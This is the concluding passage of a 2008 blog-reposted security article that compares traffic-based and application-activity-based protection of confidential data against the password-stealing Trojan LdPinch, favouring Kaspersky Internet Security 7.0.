Confidential data protection systems which analyze traffic (such as Norton Privacy Control) cannot prevent encrypted data from being sent, even if the user enters all of his passwords to all of his programs in a list of monitored data. That means that if a user has installed a Symantec program with Privacy Control or another product that uses the same approach to protect confidential information, his computer may be attacked by a new version of Trojan-PSW.Win32.LdPinch that is not included in the antivirus database and is not recognized by any of the other security components. As a result, most of that user’s passwords will be stolen and then used by cyber criminals at their discretion.
However, a protection system which analyzes application activity blocks both the harvesting (see Figure 4) and stealthed transmission (see Figure 5) of confidential data by Trojan-PSW.Win32.LdPinch.
Figure 4. Kaspersky Internet Security 7.0 warns of Trojan-PSW.Win32.LdPinch
attempt to gain access to confidential data
Figure 5. Kaspersky Internet Security 7.0 warns of Trojan-PSW.Win32.LdPinch
attempt to secretly transmit confidential data
Conclusion
This article covers the classification of methods used by malicious users to steal information via computer, and analyzes two fundamentally different techniques in developing modules which protect confidential data. Such modules are implemented in contemporary security solutions. The article also analyzes the effectiveness of both approaches, using a widely known Trojan as an example.
A comparison of both techniques shows that the technique based on analyzing application activity that could indicate an attempt to steal confidential data has major advantages. The approach using a list created by the user for his eyes only has been shown to be less effective, as it is more difficult to ensure that no part of that list is ever transmitted from the user's computer.
Saturday, June 7, 2008
Subscribe to:
Post Comments (Atom)
0 comments:
Post a Comment